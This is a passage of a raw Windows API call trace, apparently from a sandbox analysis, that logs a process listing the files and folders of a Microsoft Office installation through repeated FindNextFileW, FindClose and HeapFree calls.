ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14a640, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="VISIO.EXE", cAlternateFileName="")) returned 1 [0167.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.771] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede4358a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede4358a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x245644bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2851, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="XML2WORD.XSL", cAlternateFileName="")) returned 1 [0167.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0167.772] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b1a0d3d, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rsod", cAlternateFileName="")) returned 1 [0167.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.779] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0168.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0168.080] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6099da, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0168.080] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0168.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.082] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0168.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.090] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 1 [0168.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.133] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 0 [0168.133] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0168.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.133] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb6099da, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb67c092, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f09, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AdjacencyLetter.dotx", cAlternateFileName="ADJACE~1.DOT")) returned 1 [0168.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.138] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb787155, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb787155, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb787155, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LoanAmortization.xltx", cAlternateFileName="LOANAM~1.XLT")) returned 1 [0168.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.142] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0168.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.142] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 0 [0168.142] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0168.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.143] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb760eed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb760eed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0168.143] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0168.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.143] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb81fa9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb81fa9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db9f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OriginLetter.Dotx", cAlternateFileName="ORIGIN~3.DOT")) returned 1 [0168.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.145] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 1 [0168.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.147] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 0 [0168.147] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0168.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0168.148] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 1 [0168.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.376] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0168.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.376] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0168.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.377] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 0 [0168.377] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0168.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.377] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 1 [0168.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.380] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 0 [0168.380] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0168.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.380] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Common Programs", cAlternateFileName="COMMON~1")) returned 1 [0168.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.382] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x245b0966, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x245b0966, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245d6b52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0168.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.383] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x868ac6fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x868ac6fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0168.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.397] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8913323b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8913323b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="private", cAlternateFileName="")) returned 0 [0168.397] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0168.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0168.397] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xaf31749c, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xaf31749c, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX64", cAlternateFileName="PROGRA~3")) returned 1 [0168.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0168.400] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0168.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.402] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f7aa31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f7aa31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1702b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0168.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.403] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0168.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.407] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf086f11e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf086f11e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf086f11e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0168.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.408] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0168.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.408] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14c6cb9, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x14c6cb9, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0168.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.410] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2e1f46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0168.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0168.413] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12910b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26737b32, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26737b32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0169.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.228] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0169.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.228] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bb01a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bb01a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0169.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.239] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceb38292, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceb38292, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe172e9be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x22cad0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0169.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.241] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, 